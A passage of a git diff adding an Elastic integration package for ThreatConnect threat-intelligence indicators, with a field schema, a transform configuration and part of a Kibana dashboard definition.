+ description: Includes Enrichment data related to the indicator. + - name: expiration_duration + type: keyword + description: Duration when the IOC will expire. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Indicator was created externally. + - name: expires + type: date + description: The date and time when the Indicator expires externally. + - name: external_last + type: group + fields: + - name: modified + type: date + description: The date and time when the Indicator was last modified externally. + - name: false_positive_reported_by_user + type: boolean + description: Indicates whether false positive is reported by user. + - name: false_positives + type: long + description: Count of false positives. + - name: file_actions + type: flattened + description: A list of File Actions associated with the File Indicator. + - name: file_occurrences + type: flattened + description: A list of File Occurrences associated with the File Indicator. + - name: first_seen + type: date + description: The date and time when the Indicator was first seen. + - name: generic_custom_indicator_values + type: flattened + description: 'Includes the fields over-writing the custom field names: value1, value2, and value3.' + - name: geo_location + type: flattened + description: Includes GEO location information related to the Host and IP indicators. + - name: hashtag + type: keyword + description: The hashtag term associated with the Hashtag Indicator. + - name: host_name + type: keyword + description: The host name associated with the Host Indicator. + - name: id + type: keyword + description: Unique identifier for the indicator. + - name: investigation_links + type: flattened + description: Includes investigation links related to the indicator type. + - name: ip + type: ip + description: The IP address associated with the Address Indicator. + - name: key_name + type: keyword + description: The name of the registry key associated with the Registry Key Indicator. + - name: last_false_positive + type: date + description: Date and time of last false positive. + - name: last_modified + type: date + description: Date and time when the indicator was last modified. + - name: last_seen + type: date + description: The date and time when the Indicator was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the indicator's details in the ThreatConnect web application. + - name: md5 + type: keyword + description: MD5 hash value associated with the indicator. + - name: mutex + type: keyword + description: The synchronization primitive used to identify malware files that is associated with the Mutex. + - name: observations + type: flattened + description: Includes the Observations fields. + - name: owner + type: group + fields: + - name: id + type: keyword + description: Identifier for the owner of the indicator. + - name: name + type: keyword + description: Name of the organization that owns the indicator. + - name: private_flag + type: boolean + description: Indicates whether the indicator is marked as private. + - name: rating + type: double + description: The Indicators Threat Rating. + - name: security_labels + type: group + fields: + - name: data + type: group + fields: + - name: color + type: keyword + description: Color associated with the security label. + - name: date_added + type: date + description: ' The date and time when the security label was added.' + - name: description + type: keyword + description: Description of the security label. + - name: id + type: keyword + description: Unique identifier for the security label. + - name: name + type: keyword + description: Actual name or label of the security classification. + - name: owner + type: keyword + description: The entity or system that owns or manages the security label. + - name: sha1 + type: keyword + description: The SHA1 hash associated with the File Indicator. + - name: sha256 + type: keyword + description: The SHA256 hash associated with the File Indicator. + - name: size + type: keyword + description: The size of the file associated with the File Indicator. + - name: source + type: keyword + description: The Indicators source. + - name: subject + type: keyword + description: The subject line of the email associated with the Email Subject Indicator. + - name: summary + type: keyword + description: Summary or description of the indicator. + - name: tags + type: group + fields: + - name: data + type: group + fields: + - name: description + type: keyword + description: The Tags description. + - name: id + type: keyword + description: Unique Identifier of tag. + - name: last_used + type: date + description: Date and time when tag was last used. + - name: name + type: keyword + description: Name of tag. + - name: owner + type: keyword + description: The Organization, Community, or Source to which the Tag belongs. + - name: platforms + type: group + fields: + - name: count + type: long + description: Count of platforms. + - name: data + type: keyword + description: Platform on which tag is added. + - name: technique + type: group + fields: + - name: id + type: keyword + description: Unique Identifier of tag technique. + - name: text + type: keyword + description: The URL associated with the URL Indicator. + - name: threat_assess + type: group + fields: + - name: confidence + type: double + description: The confidence level associated with the threat assessment. + - name: rating + type: double + description: A numerical rating indicating the threat assessment level. + - name: score + type: group + fields: + - name: false_positive + type: long + description: The count of false positives associated with the threat assessment score. + - name: observed + type: long + description: The observed value associated with the threat assessment score. + - name: value + type: long + description: The overall score assigned to the threat, indicating its severity or risk. + - name: tracked_users + type: flattened + description: Includes Observations and False Positive stats of tracked users. + - name: type + type: keyword + description: Type of the indicator (e.g., File, IP address). + - name: user_agent_string + type: keyword + description: The characteristic identification string associated with the User Agent Indicator. + - name: value + type: group + fields: + - name: name + type: keyword + description: The registry value associated with the Registry Key Indicator. + - name: type + type: keyword + description: Possible values:REG_NONE,REG_BINARY,REG_DWORD,REG_DWORD_LITTLE_ENDIAN,REG_DWORD_BIG_ENDIAN,REG_EXPAND_SZ,REG_LINK,REG_MULTI_SZ,REG_QWORD,REG_QWORD_LITTLE_ENDIAN,REG_SZ. + - name: web_link + type: keyword + description: Link to the indicator's details in the ThreatConnect web application. + - name: who_is + type: flattened + description: Includes WhoIs information related to the Host indicators. + - name: whois_active + type: boolean + description: Indicates whether the Whois feature is active for the Host Indicator. diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/manifest.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/manifest.yml new file mode 100644 index 00000000000..f5296fd0c0a --- /dev/null +++ b/packages/ti_threatconnect/elasticsearch/transform/latest/manifest.yml @@ -0,0 +1,18 @@ +start: true +destination_index_template: + settings: + index: + sort: + field: + - "@timestamp" + order: + - desc + mappings: + dynamic: true + dynamic_templates: + - strings_as_keyword: + match_mapping_type: string + mapping: + ignore_above: 1024 + type: keyword + date_detection: false diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/transform.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/transform.yml new file mode 100644 index 00000000000..63e3dee8640 --- /dev/null +++ b/packages/ti_threatconnect/elasticsearch/transform/latest/transform.yml @@ -0,0 +1,35 @@ +# Use of "*" to use all namespaces defined. +source: + index: + - "logs-ti_threatconnect.indicator-*" +# The version suffix on the dest.index should be incremented if a breaking change +# is made to the index mapping. You must also bump the fleet_transform_version +# for any change to this transform configuration to take effect. The old destination +# index is not automatically deleted. We are dependent on https://github.com/elastic/package-spec/issues/523 to give +# us that ability in order to prevent having duplicate IoC data and prevent query +# time field type conflicts. +dest: + index: "logs-ti_threatconnect_latest.dest_indicator-1" + aliases: + - alias: "logs-ti_threatconnect_latest.indicator" + move_on_creation: true +latest: + unique_key: + - event.dataset + - event.id + sort: '@timestamp' +description: Latest Indicator data retrieved from ThreatConnect Indicator API. +frequency: 30s +sync: + time: + field: event.ingested + delay: 120s +retention_policy: + time: + field: threat_connect.indicator.deleted_at + max_age: 1m +_meta: + managed: true + # Bump this version to delete, reinstall, and restart the transform during package. + # Version bump is needed if there is any code change in transform. + fleet_transform_version: 0.1.0 diff --git a/packages/ti_threatconnect/img/threat-connect-indicator-dashboard.png b/packages/ti_threatconnect/img/threat-connect-indicator-dashboard.png new file mode 100644 index 00000000000..4eae5fe4222 Binary files /dev/null and b/packages/ti_threatconnect/img/threat-connect-indicator-dashboard.png differ diff --git a/packages/ti_threatconnect/img/threat-connect-logo.svg b/packages/ti_threatconnect/img/threat-connect-logo.svg new file mode 100644 index 00000000000..bb30100adb6 --- /dev/null +++ b/packages/ti_threatconnect/img/threat-connect-logo.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/packages/ti_threatconnect/kibana/dashboard/ti_threatconnect-2d465f90-973d-11ee-839e-ef65b7014120.json b/packages/ti_threatconnect/kibana/dashboard/ti_threatconnect-2d465f90-973d-11ee-839e-ef65b7014120.json new file mode 100644 index 00000000000..8c0be7b931b --- /dev/null +++ b/packages/ti_threatconnect/kibana/dashboard/ti_threatconnect-2d465f90-973d-11ee-839e-ef65b7014120.json @@ -0,0 +1,1824 @@ +{ + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "logs-*", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_threatconnect.indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_threatconnect.indicator" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "logs-*", + "key": "labels.is_ioc_transform_source", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "labels.is_ioc_transform_source" + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "Navigation\n\n[Integration Page](/app/integrations/detail/ti_threatconnect-0.1.0/overview)\n\nOverview\n\nThis dashboard shows Indicator overview related to the ThreatConnect Integration.\n\nThis dashboard is made to provide general statistics and show the detection of ingested indicators.\n\nIt provides details on overall indicators and their respective groups. Additionally, it showcases the categorization of indicators based on type and owner. The dashboard includes a breakdown of associated groups by type and status, indicator attributes categorized by type, indicators rated by rating and confidence levels. The report encompasses information on the count of indicators over time. Furthermore, it features the top 10 IP addresses, accessed URLs, and host details, along with associated groups and owners linked to each indicator.\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 27, + "i": "4ab25121-cec3-478d-b0e1-826a78ae7dcc", + "w": 13, + "x": 0, + "y": 0 + }, + "panelIndex": "4ab25121-cec3-478d-b0e1-826a78ae7dcc", + "title": "Table of Contents", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-89f5dc3a-f57a-474d-be03-49659399fcbe", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "89f5dc3a-f57a-474d-be03-49659399fcbe": { + "columnOrder": [ + "a5e9c0fe-bc13-401c-b1f6-ccb3af9ed882" + ], + "columns": { + "a5e9c0fe-bc13-401c-b1f6-ccb3af9ed882": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Indicators", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "event.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "89f5dc3a-f57a-474d-be03-49659399fcbe", + "layerType": "data", + "metricAccessor": "a5e9c0fe-bc13-401c-b1f6-ccb3af9ed882" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 13, + "i": "3ddaf7b4-453d-488c-a2ed-76a6cd318230", + "w": 17, + "x": 13, + "y": 0 + }, + "panelIndex": "3ddaf7b4-453d-488c-a2ed-76a6cd318230", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c3124540-fb37-497c-8e54-fe6206e27a29", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c3124540-fb37-497c-8e54-fe6206e27a29": { + "columnOrder": [ + "ed0fe8ca-c12a-4b1e-9de7-bc7b91f4e611" + ], + "columns": { + "ed0fe8ca-c12a-4b1e-9de7-bc7b91f4e611": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Indicator Associated Groups", + "operationType": "unique_count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "threat_connect.indicator.associated_groups.data.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "c3124540-fb37-497c-8e54-fe6206e27a29", + "layerType": "data", + "metricAccessor": "ed0fe8ca-c12a-4b1e-9de7-bc7b91f4e611" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 13, + "i": "fcb4c79b-ae94-4f79-a280-319fe1ee0a77", + "w": 18, + "x": 30, + "y": 0 + }, + "panelIndex": "fcb4c79b-ae94-4f79-a280-319fe1ee0a77", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-421cfbca-ee3a-4ebb-9ac8-9bbdcd4eae81", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "421cfbca-ee3a-4ebb-9ac8-9bbdcd4eae81": { + "columnOrder": [ + "9596563f-edf9-4d32-a415-8da068813a73", + "75d72c9c-60c0-4db0-8b44-6df1ad966759" + ], + "columns": { + "75d72c9c-60c0-4db0-8b44-6df1ad966759": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "threat_connect.indicator.associated_groups.data.id" + }, + "9596563f-edf9-4d32-a415-8da068813a73": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "75d72c9c-60c0-4db0-8b44-6df1ad966759", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.associated_groups.data.type" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "75d72c9c-60c0-4db0-8b44-6df1ad966759" + ], + "layerId": "421cfbca-ee3a-4ebb-9ac8-9bbdcd4eae81", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "9596563f-edf9-4d32-a415-8da068813a73" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "da4952b2-7a0a-47e6-8307-91fbeff1cd49", + "w": 17, + "x": 13, + "y": 13 + }, + "panelIndex": "da4952b2-7a0a-47e6-8307-91fbeff1cd49", + "title": "Indicator Associated Groups by Type [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-216e8a8a-32b9-4fa8-857c-340f946e3d84", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "216e8a8a-32b9-4fa8-857c-340f946e3d84": { + "columnOrder": [ + "add30df5-779e-401a-bab2-a9ccde1fb90c", + "85319d9a-e831-4bf0-be78-8c06b2fbd0c9" + ], + "columns": { + "85319d9a-e831-4bf0-be78-8c06b2fbd0c9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "threat_connect.indicator.associated_groups.data.id" + }, + "add30df5-779e-401a-bab2-a9ccde1fb90c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Status", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "85319d9a-e831-4bf0-be78-8c06b2fbd0c9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.associated_groups.data.status" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "85319d9a-e831-4bf0-be78-8c06b2fbd0c9" + ], + "layerId": "216e8a8a-32b9-4fa8-857c-340f946e3d84", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "xAccessor": "add30df5-779e-401a-bab2-a9ccde1fb90c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false + }, + "preferredSeriesType": "bar", + "title": "Empty XY chart", + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "561f36d9-8bd8-4438-8670-292221db6ec3", + "w": 18, + "x": 30, + "y": 13 + }, + "panelIndex": "561f36d9-8bd8-4438-8670-292221db6ec3", + "title": "Associated Groups by Status [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-961eaa59-f6c0-488d-a59d-4212ada370ae", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "961eaa59-f6c0-488d-a59d-4212ada370ae": { + "columnOrder": [ + "33d3e8e5-932c-4b9c-a525-5c3ea3361215", + "d27765e7-2a25-4eab-b8e5-b1ba23100918" + ], + "columns": { + "33d3e8e5-932c-4b9c-a525-5c3ea3361215": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "Rating", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "d27765e7-2a25-4eab-b8e5-b1ba23100918", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.rating" + }, + "d27765e7-2a25-4eab-b8e5-b1ba23100918": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "d27765e7-2a25-4eab-b8e5-b1ba23100918" + ], + "layerId": "961eaa59-f6c0-488d-a59d-4212ada370ae", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "xAccessor": "33d3e8e5-932c-4b9c-a525-5c3ea3361215" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false + }, + "preferredSeriesType": "bar", + "title": "Empty XY chart", + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "1cdedc22-76b1-44fa-9cf5-296d8ff7c09b", + "w": 24, + "x": 0, + "y": 27 + }, + "panelIndex": "1cdedc22-76b1-44fa-9cf5-296d8ff7c09b", + "title": "Indicator by Rating [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f6579f3d-a2c5-4667-a2ba-7ed6f0397e2a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f6579f3d-a2c5-4667-a2ba-7ed6f0397e2a": { + "columnOrder": [ + "eb29be3b-6d12-4bd9-87a8-4ec0b378d9b8", + "c29f1f0c-75a1-43df-a242-5aebf0d99f06" + ], + "columns": { + "c29f1f0c-75a1-43df-a242-5aebf0d99f06": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "eb29be3b-6d12-4bd9-87a8-4ec0b378d9b8": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "c29f1f0c-75a1-43df-a242-5aebf0d99f06", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "c29f1f0c-75a1-43df-a242-5aebf0d99f06" + ], + "layerId": "f6579f3d-a2c5-4667-a2ba-7ed6f0397e2a", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "xAccessor": "eb29be3b-6d12-4bd9-87a8-4ec0b378d9b8" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false + }, + "preferredSeriesType": "bar", + "title": "Empty XY chart", + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "aa6453b1-0bb5-4f14-b7e1-4f4ac6196676", + "w": 24, + "x": 24, + "y": 27 + }, + "panelIndex": "aa6453b1-0bb5-4f14-b7e1-4f4ac6196676", + "title": "Indicator by Type [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dcd07ab5-5229-4f16-bee4-af9aff1817a9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dcd07ab5-5229-4f16-bee4-af9aff1817a9": { + "columnOrder": [ + "3edd419a-a55c-4ccc-bed2-bb2b21f7a4bb", + "890482c1-0951-464b-aa0d-24e845e32e2d" + ], + "columns": { + "3edd419a-a55c-4ccc-bed2-bb2b21f7a4bb": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "890482c1-0951-464b-aa0d-24e845e32e2d", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.ip" + }, + "890482c1-0951-464b-aa0d-24e845e32e2d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "890482c1-0951-464b-aa0d-24e845e32e2d", + "isTransposed": false + }, + { + "columnId": "3edd419a-a55c-4ccc-bed2-bb2b21f7a4bb", + "isTransposed": false + } + ], + "layerId": "dcd07ab5-5229-4f16-bee4-af9aff1817a9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "dc75f1d2-0674-4521-a88d-38f0c66ff7c9", + "w": 24, + "x": 0, + "y": 42 + }, + "panelIndex": "dc75f1d2-0674-4521-a88d-38f0c66ff7c9", + "title": "Top 10 IP Addresses [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f601aefb-f565-4983-beff-a2cafafff86d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f601aefb-f565-4983-beff-a2cafafff86d": { + "columnOrder": [ + "8ed20c0c-2a3c-4d21-96f2-898be1b96920", + "7bb86456-e978-47b9-af5e-91996719c084" + ], + "columns": { + "7bb86456-e978-47b9-af5e-91996719c084": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "8ed20c0c-2a3c-4d21-96f2-898be1b96920": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "Confidence", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "7bb86456-e978-47b9-af5e-91996719c084", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.confidence" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "7bb86456-e978-47b9-af5e-91996719c084" + ], + "layerId": "f601aefb-f565-4983-beff-a2cafafff86d", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "8ed20c0c-2a3c-4d21-96f2-898be1b96920" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "cd65eda6-09a2-4264-9288-0845dd8db3cf", + "w": 24, + "x": 24, + "y": 42 + }, + "panelIndex": "cd65eda6-09a2-4264-9288-0845dd8db3cf", + "title": "Indicator by Confidence [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-b9ea7b8e-ee36-4720-b936-c34cead4e4ed", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b9ea7b8e-ee36-4720-b936-c34cead4e4ed": { + "columnOrder": [ + "08573390-8963-42f9-9028-537f075a50f6", + "87278fc6-293b-4844-9ab2-01345a3cbaff" + ], + "columns": { + "08573390-8963-42f9-9028-537f075a50f6": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "87278fc6-293b-4844-9ab2-01345a3cbaff", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "observer.hostname" + }, + "87278fc6-293b-4844-9ab2-01345a3cbaff": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "08573390-8963-42f9-9028-537f075a50f6", + "isTransposed": false + }, + { + "columnId": "87278fc6-293b-4844-9ab2-01345a3cbaff", + "isTransposed": false + } + ], + "layerId": "b9ea7b8e-ee36-4720-b936-c34cead4e4ed", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": 